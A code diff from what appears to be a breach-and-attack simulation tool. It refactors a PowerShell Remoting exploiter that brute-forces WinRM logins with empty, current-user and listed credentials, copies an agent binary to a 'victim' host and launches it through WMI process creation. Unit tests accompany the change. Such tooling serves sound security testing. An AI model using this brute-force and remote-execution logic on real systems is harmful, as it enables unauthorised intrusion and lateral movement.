diff --git a/monkey/infection_monkey/exploit/powershell.py b/monkey/infection_monkey/exploit/powershell.py index 69e7afe95..9e3d3d5dc 100644 --- a/monkey/infection_monkey/exploit/powershell.py +++ b/monkey/infection_monkey/exploit/powershell.py @@ -1,29 +1,29 @@ import logging import os -from typing import Optional, Union - -import pypsrp -import spnego -from pypsrp.exceptions import AuthenticationError -from pypsrp.powershell import PowerShell, RunspacePool -from urllib3 import connectionpool +from typing import List, Optional import infection_monkey.monkeyfs as monkeyfs from common.utils.exploit_enum import ExploitType -from infection_monkey.exploit.consts import WIN_ARCH_32, WIN_ARCH_64 +from infection_monkey.exploit.consts import WIN_ARCH_32 from infection_monkey.exploit.HostExploiter import HostExploiter from infection_monkey.exploit.powershell_utils import utils -from infection_monkey.exploit.powershell_utils.auth_options import AuthOptions -from infection_monkey.exploit.powershell_utils.credential_generation import get_credentials -from infection_monkey.exploit.powershell_utils.utils import ( - IClient, - get_client_based_on_auth_options, +from infection_monkey.exploit.powershell_utils.auth_options import ( + AUTH_NEGOTIATE, + ENCRYPTION_AUTO, + AuthOptions, + get_auth_options, +) +from infection_monkey.exploit.powershell_utils.credentials import Credentials, get_credentials +from infection_monkey.exploit.powershell_utils.powershell_client import ( + AuthenticationError, + IPowerShellClient, + PowerShellClient, ) from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey_by_os -from infection_monkey.model import GET_ARCH_WINDOWS, VictimHost +from infection_monkey.model import VictimHost from infection_monkey.utils.environment import is_windows_os -LOG = logging.getLogger(__name__) +logger = logging.getLogger(__name__) TEMP_MONKEY_BINARY_FILEPATH = "./monkey_temp_bin" @@ -38,17 +38,8 @@ class PowerShellExploiter(HostExploiter): _EXPLOITED_SERVICE = "PowerShell Remoting (WinRM)" def __init__(self, host: VictimHost): - PowerShellExploiter._set_sensitive_packages_log_level_to_error() - super().__init__(host) - self.client = None - - @staticmethod - def _set_sensitive_packages_log_level_to_error(): - # If root logger is inherited, extensive and potentially sensitive info could be logged - sensitive_packages = [pypsrp, spnego, connectionpool] - for package in sensitive_packages: - logging.getLogger(package.__name__).setLevel(logging.ERROR) + self._client = None def _exploit_host(self): try: @@ -58,14 +49,12 @@ class PowerShellExploiter(HostExploiter): return False credentials = get_credentials( - self._config.exploit_user_list, - self._config.exploit_password_list, - is_windows_os(), - is_https=is_https, + self._config.exploit_user_list, self._config.exploit_password_list, is_windows_os() ) + auth_options = get_auth_options(credentials, is_https) - self.client = self._authenticate_via_brute_force(credentials) - if not self.client: + self._client = self._authenticate_via_brute_force(credentials, auth_options) + if not self._client: return False return self._execute_monkey_agent_on_victim() @@ -91,80 +80,84 @@ class PowerShellExploiter(HostExploiter): raise PowerShellRemotingDisabledError("Powershell remoting seems to be disabled.") def _try_http(self): - auth_options_http = AuthOptions( - username=self._config.exploit_user_list[0], - password=self._config.exploit_password_list[0], - is_https=False, - ) - self._authenticate(auth_options_http) + self._try_ssl_login(use_ssl=False) def _try_https(self): - auth_options_http = AuthOptions( - username=self._config.exploit_user_list[0], - password=self._config.exploit_password_list[0], - is_https=True, + self._try_ssl_login(use_ssl=True) + + def _try_ssl_login(self, use_ssl: bool): + credentials = Credentials( + username="dummy_username", + password="dummy_password", ) - self._authenticate(auth_options_http) - def _authenticate_via_brute_force(self, credentials: [AuthOptions]) -> Optional[IClient]: - for credential in credentials: + auth_options = AuthOptions( + auth_type=AUTH_NEGOTIATE, + encryption=ENCRYPTION_AUTO, + ssl=use_ssl, + ) + + PowerShellClient(self.host.ip_addr, credentials, auth_options) + + def _authenticate_via_brute_force( + self, credentials: List[Credentials], auth_options: List[AuthOptions] + ) -> Optional[IPowerShellClient]: + for (creds, opts) in zip(credentials, auth_options): try: - client = self._authenticate(credential) + client = PowerShellClient(self.host.ip_addr, creds, opts) - LOG.info( + logger.info( f"Successfully logged into {self.host.ip_addr} using Powershell. User: " - f"{credential.username}" + f"{creds.username}" ) - self.report_login_attempt(True, credential.username, credential.password) + self.report_login_attempt(True, creds.username, creds.password) return client except Exception as ex: # noqa: F841 - LOG.debug( + logger.debug( f"Error logging into {self.host.ip_addr} using Powershell. User: " - f"{credential.username}, Error: {ex}" + f"{creds.username}, Error: {ex}" ) - self.report_login_attempt(False, credential.username, credential.password) + self.report_login_attempt(False, creds.username, creds.password) return None - def _authenticate(self, auth_options: AuthOptions) -> IClient: - client = get_client_based_on_auth_options(self.host.ip_addr, auth_options) - - # attempt to execute dir command to know if authentication was successful - client.execute_cmd("dir") - - return client - def _execute_monkey_agent_on_victim(self) -> bool: - arch = self._get_host_arch() + arch = self._client.get_host_architecture() self.is_32bit = arch == WIN_ARCH_32 - - self._write_virtual_file_to_local_path() + logger.debug(f"Host architecture is {arch}") monkey_path_on_victim = ( self._config.dropper_target_path_win_32 if self.is_32bit else self._config.dropper_target_path_win_64 ) - is_monkey_copy_successful = self._copy_monkey_binary_to_victim(monkey_path_on_victim) + is_monkey_copy_successful = self._copy_monkey_binary_to_victim(monkey_path_on_victim) if is_monkey_copy_successful: + logger.info("Successfully copied the monkey binary to the victim.") self._run_monkey_executable_on_victim(monkey_path_on_victim) else: + logger.error("Failed to copy the monkey binary to the victim.") return False return True - def _get_host_arch(self) -> Union[WIN_ARCH_32, WIN_ARCH_64]: - output = self._execute_cmd_on_host(GET_ARCH_WINDOWS) - if "64-bit" in output: - return WIN_ARCH_64 - else: - return WIN_ARCH_32 + def _copy_monkey_binary_to_victim(self, monkey_path_on_victim) -> bool: + try: + self._write_virtual_file_to_local_path() - def _execute_cmd_on_host(self, cmd: str) -> str: - output, _, _ = self.client.execute_cmd(cmd) - return output + logger.info(f"Attempting to copy the monkey agent binary to {self.host.ip_addr}") + is_monkey_copy_successful = self._client.copy_file( + TEMP_MONKEY_BINARY_FILEPATH, monkey_path_on_victim + ) + except Exception as ex: + raise ex + finally: + if os.path.isfile(TEMP_MONKEY_BINARY_FILEPATH): + os.remove(TEMP_MONKEY_BINARY_FILEPATH) + + return is_monkey_copy_successful def _write_virtual_file_to_local_path(self) -> None: monkey_fs_path = get_target_monkey_by_os(is_windows=True, is_32bit=self.is_32bit) @@ -173,30 +166,13 @@ class PowerShellExploiter(HostExploiter): with open(TEMP_MONKEY_BINARY_FILEPATH, "wb") as monkey_local_file: monkey_local_file.write(monkey_virtual_file.read()) - def _copy_monkey_binary_to_victim(self, dest: str) -> bool: - LOG.debug(f"Attempting to copy the monkey agent binary to {self.host.ip_addr}") - try: - self.client.copy(TEMP_MONKEY_BINARY_FILEPATH, dest) - LOG.info(f"Successfully copied the monkey agent binary to {self.host.ip_addr}") - return True - except Exception as ex: - LOG.error(f"Failed to copy the monkey agent binary to {self.host.ip_addr}: {ex}") - return False - finally: - os.remove(TEMP_MONKEY_BINARY_FILEPATH) - def _run_monkey_executable_on_victim(self, executable_path) -> None: monkey_execution_command = utils.build_monkey_execution_command( self.host, get_monkey_depth() - 1, executable_path ) - LOG.debug( - f"Attempting to execute the monkey agent on remote host " - f'{self.host.ip_addr} with commmand "{monkey_execution_command}"' + logger.info( + f"Attempting to execute the monkey agent on remote host " f"{self.host.ip_addr}" ) - with self.client.wsman, RunspacePool(self.client.wsman) as pool: - ps = PowerShell(pool) - ps.add_cmdlet("Invoke-WmiMethod").add_parameter("path", "win32_process").add_parameter( - "name", "create" - ).add_parameter("ArgumentList", monkey_execution_command) - ps.invoke() + + self._client.execute_cmd_as_detached_process(monkey_execution_command) diff --git a/monkey/infection_monkey/exploit/powershell_utils/auth_options.py b/monkey/infection_monkey/exploit/powershell_utils/auth_options.py index 09b5d3e8b..a9c34e2cf 100644 --- a/monkey/infection_monkey/exploit/powershell_utils/auth_options.py +++ b/monkey/infection_monkey/exploit/powershell_utils/auth_options.py @@ -1,9 +1,30 @@ from dataclasses import dataclass -from typing import Union +from typing import List + +from infection_monkey.exploit.powershell_utils.credentials import Credentials + +AUTH_BASIC = "basic" +AUTH_NEGOTIATE = "negotiate" +ENCRYPTION_AUTO = "auto" +ENCRYPTION_NEVER = "never" @dataclass class AuthOptions: - username: Union[str, None] - password: Union[str, None] - is_https: bool + auth_type: str + encryption: str + ssl: bool + + +def get_auth_options(credentials: List[Credentials], use_ssl: bool) -> List[AuthOptions]: + auth_options = [] + + for creds in credentials: + # Passwordless login only works with SSL false, AUTH_BASIC and ENCRYPTION_NEVER + ssl = False if creds.password == "" else use_ssl + auth_type = AUTH_BASIC if creds.password == "" else AUTH_NEGOTIATE + encryption = ENCRYPTION_NEVER if creds.password == "" else ENCRYPTION_AUTO + + auth_options.append(AuthOptions(auth_type, encryption, ssl)) + + return auth_options diff --git a/monkey/infection_monkey/exploit/powershell_utils/credential_generation.py b/monkey/infection_monkey/exploit/powershell_utils/credential_generation.py deleted file mode 100644 index a376555ca..000000000 --- a/monkey/infection_monkey/exploit/powershell_utils/credential_generation.py +++ /dev/null @@ -1,46 +0,0 @@ -from itertools import product -from typing import List - -from infection_monkey.exploit.powershell_utils.auth_options import AuthOptions - - -def get_credentials( - usernames: List[str], passwords: List[str], is_windows: bool, is_https: bool -) -> List[AuthOptions]: - credentials = [] - credentials.extend(_get_empty_credentials(is_windows)) - credentials.extend(_get_username_only_credentials(usernames, is_windows)) - credentials.extend(_get_username_password_credentials(usernames, passwords, is_https=is_https)) - - return credentials - - -def _get_empty_credentials(is_windows: bool) -> List[AuthOptions]: - if is_windows: - return [AuthOptions(username=None, password=None, is_https=False)] - - return [] - - -def _get_username_only_credentials(usernames: List[str], is_windows: bool) -> List[AuthOptions]: - credentials = [ - AuthOptions(username=username, password="", is_https=False) for username in usernames - ] - - if is_windows: - credentials.extend( - [AuthOptions(username=username, password=None, is_https=True) for username in usernames] - ) - - return credentials - - -def _get_username_password_credentials( - usernames: List[str], passwords: List[str], is_https: bool -) -> List[AuthOptions]: - username_password_pairs = product(usernames, passwords) - - return [ - AuthOptions(credentials[0], credentials[1], is_https=is_https) - for credentials in username_password_pairs - ] diff --git a/monkey/infection_monkey/exploit/powershell_utils/credentials.py b/monkey/infection_monkey/exploit/powershell_utils/credentials.py new file mode 100644 index 000000000..a04d9f395 --- /dev/null +++ b/monkey/infection_monkey/exploit/powershell_utils/credentials.py @@ -0,0 +1,50 @@ +from dataclasses import dataclass +from itertools import product +from typing import List, Union + + +@dataclass +class Credentials: + username: Union[str, None] + password: Union[str, None] + + +def get_credentials( + usernames: List[str], passwords: List[str], is_windows: bool +) -> List[Credentials]: + credentials = [] + credentials.extend(_get_empty_credentials(is_windows)) + credentials.extend(_get_username_only_credentials(usernames, is_windows)) + credentials.extend(_get_username_password_credentials(usernames, passwords)) + + return credentials + + +# On Windows systems, when username == None and password == None, the current user's credentials +# will be used to attempt to log into the victim. +def _get_empty_credentials(is_windows: bool) -> List[Credentials]: + if is_windows: + return [Credentials(username=None, password=None)] + + return [] + + +# On Windows systems, when password == None, the current user's password will bu used to attempt to +# log into the victim. +def _get_username_only_credentials(usernames: List[str], is_windows: bool) -> List[Credentials]: + credentials = [Credentials(username=username, password="") for username in usernames] + + if is_windows: + credentials.extend( + [Credentials(username=username, password=None) for username in usernames] + ) + + return credentials + + +def _get_username_password_credentials( + usernames: List[str], passwords: List[str] +) -> List[Credentials]: + username_password_pairs = product(usernames, passwords) + + return [Credentials(credentials[0], credentials[1]) for credentials in username_password_pairs] diff --git a/monkey/infection_monkey/exploit/powershell_utils/powershell_client.py b/monkey/infection_monkey/exploit/powershell_utils/powershell_client.py new file mode 100644 index 000000000..7f0b548b1 --- /dev/null +++ b/monkey/infection_monkey/exploit/powershell_utils/powershell_client.py @@ -0,0 +1,99 @@ +import abc +import logging +from typing import Union + +import pypsrp +import spnego +from pypsrp.client import Client +from pypsrp.exceptions import AuthenticationError # noqa: F401 +from pypsrp.powershell import PowerShell, RunspacePool +from typing_extensions import Protocol +from urllib3 import connectionpool + +from infection_monkey.exploit.consts import WIN_ARCH_32, WIN_ARCH_64 +from infection_monkey.exploit.powershell_utils.auth_options import AuthOptions +from infection_monkey.exploit.powershell_utils.credentials import Credentials +from infection_monkey.model import GET_ARCH_WINDOWS + +logger = logging.getLogger(__name__) + +CONNECTION_TIMEOUT = 3 # Seconds + + +def _set_sensitive_packages_log_level_to_error(): + # If root logger is inherited, extensive and potentially sensitive info could be logged + sensitive_packages = [pypsrp, spnego, connectionpool] + for package in sensitive_packages: + logging.getLogger(package.__name__).setLevel(logging.ERROR) + + +class IPowerShellClient(Protocol, metaclass=abc.ABCMeta): + @abc.abstractmethod + def execute_cmd(self, cmd: str) -> str: + pass + + @abc.abstractmethod + def get_host_architecture(self) -> Union[WIN_ARCH_32, WIN_ARCH_64]: + pass + + @abc.abstractmethod + def copy_file(self, src: str, dest: str) -> bool: + pass + + @abc.abstractmethod + def execute_cmd_as_detached_process(self, cmd: str): + pass + + +class PowerShellClient(IPowerShellClient): + def __init__(self, ip_addr, credentials: Credentials, auth_options: AuthOptions): + _set_sensitive_packages_log_level_to_error() + + self._ip_addr = ip_addr + self._client = Client( + ip_addr, + username=credentials.username, + password=credentials.password, + cert_validation=False, + auth=auth_options.auth_type, + encryption=auth_options.encryption, + ssl=auth_options.ssl, + connection_timeout=CONNECTION_TIMEOUT, + ) + + # attempt to execute dir command to know if authentication was successful + self.execute_cmd("dir") + + def execute_cmd(self, cmd: str) -> str: + output, _, _ = self._client.execute_cmd(cmd) + return output + + def get_host_architecture(self) -> Union[WIN_ARCH_32, WIN_ARCH_64]: + output = self._client.execute_cmd(GET_ARCH_WINDOWS) + if "64-bit" in output: + return WIN_ARCH_64 + + return WIN_ARCH_32 + + def copy_file(self, src: str, dest: str) -> bool: + try: + self._client.copy(src, dest) + logger.debug(f"Successfully copied {src} to {dest} on {self._ip_addr}") + + return True + except Exception as ex: + logger.error(f"Failed to copy {src} to {dest} on {self._ip_addr}: {ex}") + + return False + + def execute_cmd_as_detached_process(self, cmd: str): + logger.debug( + f"Attempting to execute a command on the remote host as a detached process - " + f"Host: {self._ip_addr}, Command: {cmd}" + ) + with self._client.wsman, RunspacePool(self._client.wsman) as pool: + ps = PowerShell(pool) + ps.add_cmdlet("Invoke-WmiMethod").add_parameter("path", "win32_process").add_parameter( + "name", "create" + ).add_parameter("ArgumentList", cmd) + ps.invoke() diff --git a/monkey/infection_monkey/exploit/powershell_utils/utils.py b/monkey/infection_monkey/exploit/powershell_utils/utils.py index b6198141d..4c0ab3dce 100644 --- a/monkey/infection_monkey/exploit/powershell_utils/utils.py +++ b/monkey/infection_monkey/exploit/powershell_utils/utils.py @@ -1,7 +1,3 @@ -from pypsrp.client import Client -from typing_extensions import Protocol - -from infection_monkey.exploit.powershell_utils.auth_options import AuthOptions from infection_monkey.model import DROPPER_ARG, RUN_MONKEY, VictimHost from infection_monkey.utils.commands import build_monkey_commandline @@ -19,38 +15,3 @@ def build_monkey_execution_command(host: VictimHost, depth: int, executable_path "monkey_type": DROPPER_ARG, "parameters": monkey_params, } - - -AUTH_BASIC = "basic" -AUTH_NEGOTIATE = "negotiate" -ENCRYPTION_AUTO = "auto" -ENCRYPTION_NEVER = "never" - -CONNECTION_TIMEOUT = 3 # Seconds - - -class IClient(Protocol): - def execute_cmd(self, cmd: str): - pass - - -def get_client_based_on_auth_options(ip_addr: str, auth_options: AuthOptions) -> IClient: - - # Passwordless login only works with SSL false, AUTH_BASIC and ENCRYPTION_NEVER - if auth_options.password == "": - ssl = False - else: - ssl = auth_options.is_https - auth = AUTH_NEGOTIATE if auth_options.password != "" else AUTH_BASIC - encryption = ENCRYPTION_AUTO if auth_options.password != "" else ENCRYPTION_NEVER - - return Client( - ip_addr, - username=auth_options.username, - password=auth_options.password, - cert_validation=False, - ssl=ssl, - auth=auth, - encryption=encryption, - connection_timeout=CONNECTION_TIMEOUT, - ) diff --git a/monkey/tests/unit_tests/infection_monkey/exploit/powershell_utils/test_auth_options.py b/monkey/tests/unit_tests/infection_monkey/exploit/powershell_utils/test_auth_options.py new file mode 100644 index 000000000..0a917adac --- /dev/null +++ b/monkey/tests/unit_tests/infection_monkey/exploit/powershell_utils/test_auth_options.py @@ -0,0 +1,87 @@ +# from infection_monkey.exploit.powershell_utils.auth_options import AuthOptions +from infection_monkey.exploit.powershell_utils.auth_options import ( + AUTH_BASIC, + AUTH_NEGOTIATE, + ENCRYPTION_AUTO, + ENCRYPTION_NEVER, + get_auth_options, +) +from infection_monkey.exploit.powershell_utils.credentials import Credentials + +CREDENTIALS = [ + Credentials("user1", "password1"), + Credentials("user2", ""), + Credentials("user3", None), +] + + +def test_get_auth_options__ssl_true_with_password(): + auth_options = get_auth_options(CREDENTIALS, use_ssl=True) + + assert auth_options[0].ssl + + +def test_get_auth_options__ssl_true_empty_password(): + auth_options = get_auth_options(CREDENTIALS, use_ssl=True) + + assert not auth_options[1].ssl + + +def test_get_auth_options__ssl_true_none_password(): + auth_options = get_auth_options(CREDENTIALS, use_ssl=True) + + assert auth_options[2].ssl + + +def test_get_auth_options__ssl_false_with_password(): + auth_options = get_auth_options(CREDENTIALS, use_ssl=False) + + assert not auth_options[0].ssl + + +def test_get_auth_options__ssl_false_empty_password(): + auth_options = get_auth_options(CREDENTIALS, use_ssl=False) + + assert not auth_options[1].ssl + + +def test_get_auth_options__ssl_false_none_password(): + auth_options = get_auth_options(CREDENTIALS, use_ssl=False) + + assert not auth_options[2].ssl + + +def test_get_auth_options__auth_type_with_password(): + auth_options = get_auth_options(CREDENTIALS, use_ssl=False) + + assert auth_options[0].auth_type == AUTH_NEGOTIATE + + +def test_get_auth_options__auth_type_empty_password(): + auth_options = get_auth_options(CREDENTIALS, use_ssl=False) + + assert auth_options[1].auth_type == AUTH_BASIC + + +def test_get_auth_options__auth_type_none_password(): + auth_options = get_auth_options(CREDENTIALS, use_ssl=False) + + assert auth_options[2].auth_type == AUTH_NEGOTIATE + + +def test_get_auth_options__encryption_with_password(): + auth_options = get_auth_options(CREDENTIALS, use_ssl=False) + + assert auth_options[0].encryption == ENCRYPTION_AUTO + + +def test_get_auth_options__encryption_empty_password(): + auth_options = get_auth_options(CREDENTIALS, use_ssl=False) + + assert auth_options[1].encryption == ENCRYPTION_NEVER + + +def test_get_auth_options__encryption_none_password(): + auth_options = get_auth_options(CREDENTIALS, use_ssl=False) + + assert auth_options[2].encryption == ENCRYPTION_AUTO diff --git a/monkey/tests/unit_tests/infection_monkey/exploit/powershell_utils/test_credentials.py b/monkey/tests/unit_tests/infection_monkey/exploit/powershell_utils/test_credentials.py new file mode 100644 index 000000000..f1913169c --- /dev/null +++ b/monkey/tests/unit_tests/infection_monkey/exploit/powershell_utils/test_credentials.py @@ -0,0 +1,44 @@ +from infection_monkey.exploit.powershell_utils.credentials import Credentials, get_credentials + +TEST_USERNAMES = ["user1", "user2"] +TEST_PASSWORDS = ["p1", "p2"] + + +def test_get_credentials__empty_windows_true(): + credentials = get_credentials([], [], True) + + assert len(credentials) == 1 + assert credentials[0] == Credentials(username=None, password=None) + + +def test_get_credentials__empty_windows_false(): + credentials = get_credentials([], [], False) + + assert len(credentials) == 0 + + +def test_get_credentials__username_only_windows_true(): + credentials = get_credentials(TEST_USERNAMES, [], True) + + assert len(credentials) == 5 + assert Credentials(username=TEST_USERNAMES[0], password="") in credentials + assert Credentials(username=TEST_USERNAMES[1], password="") in credentials + assert Credentials(username=TEST_USERNAMES[0], password=None) in credentials + assert Credentials(username=TEST_USERNAMES[1], password=None) in credentials + + +def test_get_credentials__username_only_windows_false(): + credentials = get_credentials(TEST_USERNAMES, [], False) + + assert len(credentials) == 2 + assert Credentials(username=TEST_USERNAMES[0], password="") in credentials + assert Credentials(username=TEST_USERNAMES[1], password="") in credentials + + +def test_get_credentials__username_password_windows_true(): + credentials = get_credentials(TEST_USERNAMES, TEST_PASSWORDS, True) + + assert len(credentials) == 9 + for user in TEST_USERNAMES: + for password in TEST_PASSWORDS: + assert Credentials(username=user, password=password) in credentials diff --git a/monkey/tests/unit_tests/infection_monkey/exploit/powershell_utils/test_utils.py b/monkey/tests/unit_tests/infection_monkey/exploit/powershell_utils/test_utils.py index 65ecea49e..de5ca3b5d 100644 --- a/monkey/tests/unit_tests/infection_monkey/exploit/powershell_utils/test_utils.py +++ b/monkey/tests/unit_tests/infection_monkey/exploit/powershell_utils/test_utils.py @@ -1,51 +1,6 @@ from infection_monkey.exploit.powershell_utils import utils -from infection_monkey.exploit.powershell_utils.auth_options import AuthOptions -from infection_monkey.exploit.powershell_utils.credential_generation import get_credentials from infection_monkey.model.host import VictimHost -TEST_USERNAMES = ["user1", "user2"] -TEST_PASSWORDS = ["p1", "p2"] - - -def test_get_credentials__empty_windows_true(): - credentials = get_credentials([], [], True, True) - - assert len(credentials) == 1 - assert credentials[0] == AuthOptions(username=None, password=None, is_https=False) - - -def test_get_credentials__empty_windows_false(): - credentials = get_credentials([], [], False, True) - - assert len(credentials) == 0 - - -def test_get_credentials__username_only_windows_true(): - credentials = get_credentials(TEST_USERNAMES, [], True, True) - - assert len(credentials) == 5 - assert AuthOptions(username=TEST_USERNAMES[0], password="", is_https=False) in credentials - assert AuthOptions(username=TEST_USERNAMES[1], password="", is_https=False) in credentials - assert AuthOptions(username=TEST_USERNAMES[0], password=None, is_https=True) in credentials - assert AuthOptions(username=TEST_USERNAMES[1], password=None, is_https=True) in credentials - - -def test_get_credentials__username_only_windows_false(): - credentials = get_credentials(TEST_USERNAMES, [], False, True) - - assert len(credentials) == 2 - assert AuthOptions(username=TEST_USERNAMES[0], password="", is_https=False) in credentials - assert AuthOptions(username=TEST_USERNAMES[1], password="", is_https=False) in credentials - - -def test_get_credentials__username_password_windows_true(): - credentials = get_credentials(TEST_USERNAMES, TEST_PASSWORDS, True, True) - - assert len(credentials) == 9 - for user in TEST_USERNAMES: - for password in TEST_PASSWORDS: - assert AuthOptions(username=user, password=password, is_https=True) in credentials - def test_build_monkey_execution_command(): host = VictimHost("127.0.0.1") diff --git a/monkey/tests/unit_tests/infection_monkey/exploit/test_powershell.py b/monkey/tests/unit_tests/infection_monkey/exploit/test_powershell.py new file mode 100644 index 000000000..3d14d2d67 --- /dev/null +++ b/monkey/tests/unit_tests/infection_monkey/exploit/test_powershell.py @@ -0,0 +1,143 @@ +from collections import namedtuple +from unittest.mock import MagicMock + +import pytest + +from infection_monkey.exploit import powershell +from infection_monkey.exploit.consts import WIN_ARCH_32, WIN_ARCH_64 +from infection_monkey.exploit.powershell_utils.auth_options import AuthOptions +from infection_monkey.exploit.powershell_utils.credentials import Credentials +from infection_monkey.model.host import VictimHost + +USER_LIST = ["user1", "user2"] +PASSWORD_LIST = ["pass1", "pass2"] +DROPPER_TARGET_PATH_32 = "C:\\agent32" +DROPPER_TARGET_PATH_64 = "C:\\agent64" + +Config = namedtuple( + "Config", + [ + "exploit_user_list", + "exploit_password_list", + "dropper_target_path_win_32", + "dropper_target_path_win_64", + ], +) + + +class TestAuthenticationError(Exception): + pass + + +@pytest.fixture +def powershell_exploiter(monkeypatch): + host = VictimHost("127.0.0.1") + pe = powershell.PowerShellExploiter(host) + pe._config = Config(USER_LIST, PASSWORD_LIST, DROPPER_TARGET_PATH_32, DROPPER_TARGET_PATH_64) + + monkeypatch.setattr(powershell, "AuthenticationError", TestAuthenticationError) + # It's regrettable to mock out a private method on the PowerShellExploiter instance object, but + # it's necessary to avoid having to deal with the monkeyfs + monkeypatch.setattr(pe, "_write_virtual_file_to_local_path", lambda: None) + + return pe + + +def test_powershell_disabled(monkeypatch, powershell_exploiter): + mock_powershell_client = MagicMock(side_effect=Exception) + monkeypatch.setattr(powershell, "PowerShellClient", mock_powershell_client) + + success = powershell_exploiter.exploit_host() + assert not success + + +def test_powershell_http(monkeypatch, powershell_exploiter): + def allow_http(_, credentials: Credentials, auth_options: AuthOptions): + if not auth_options.ssl: + raise TestAuthenticationError + else: + raise Exception + + mock_powershell_client = MagicMock(side_effect=allow_http) + monkeypatch.setattr(powershell, "PowerShellClient", mock_powershell_client) + powershell_exploiter.exploit_host() + + for call_args in mock_powershell_client.call_args_list: + assert not call_args[0][2].ssl + + +def test_powershell_https(monkeypatch, powershell_exploiter): + def allow_https(_, credentials: Credentials, auth_options: AuthOptions): + if auth_options.ssl: + raise TestAuthenticationError + else: + raise Exception + + mock_powershell_client = MagicMock(side_effect=allow_https) + monkeypatch.setattr(powershell, "PowerShellClient", mock_powershell_client) + powershell_exploiter.exploit_host() + + for call_args in mock_powershell_client.call_args_list: + if call_args[0][1].password != "" and call_args[0][1].password != "dummy_password": + assert call_args[0][2].ssl + + +def test_no_valid_credentials(monkeypatch, powershell_exploiter): + mock_powershell_client = MagicMock(side_effect=TestAuthenticationError) + monkeypatch.setattr(powershell, "PowerShellClient", mock_powershell_client) + + success = powershell_exploiter.exploit_host() + assert not success + + +def authenticate(mock_client): + def inner(_, credentials: Credentials, auth_options: AuthOptions): + if credentials.username == "user1" and credentials.password == "pass2": + return mock_client + else: + raise TestAuthenticationError("Invalid credentials") + + return inner + + +@pytest.mark.parametrize( + "dropper_target_path,arch", + [(DROPPER_TARGET_PATH_32, WIN_ARCH_32), (DROPPER_TARGET_PATH_64, WIN_ARCH_64)], +) +def test_successful_copy(monkeypatch, powershell_exploiter, dropper_target_path, arch): + mock_client = MagicMock() + mock_client.get_host_architecture = lambda: arch + mock_client.copy_file = MagicMock(return_value=True) + + mock_powershell_client = MagicMock(side_effect=authenticate(mock_client)) + monkeypatch.setattr(powershell, "PowerShellClient", mock_powershell_client) + + success = powershell_exploiter.exploit_host() + + assert dropper_target_path in mock_client.copy_file.call_args[0][1] + assert success + + +def test_failed_copy(monkeypatch, powershell_exploiter): + mock_client = MagicMock() + mock_client.get_host_architecture = lambda: WIN_ARCH_32 + mock_client.copy_file = MagicMock(return_value=False) + + mock_powershell_client = MagicMock(side_effect=authenticate(mock_client)) + monkeypatch.setattr(powershell, "PowerShellClient", mock_powershell_client) + + success = powershell_exploiter.exploit_host() + assert not success + + +def test_failed_monkey_execution(monkeypatch, powershell_exploiter): + mock_client = MagicMock() + mock_client.get_host_architecture = lambda: WIN_ARCH_32 + mock_client.copy_file = MagicMock(return_value=True) + mock_client.execute_cmd_as_detached_process = MagicMock(side_effect=Exception) + + mock_powershell_client = MagicMock(side_effect=authenticate(mock_client)) + monkeypatch.setattr(powershell, "PowerShellClient", mock_powershell_client) + + success = powershell_exploiter.exploit_host() + assert not success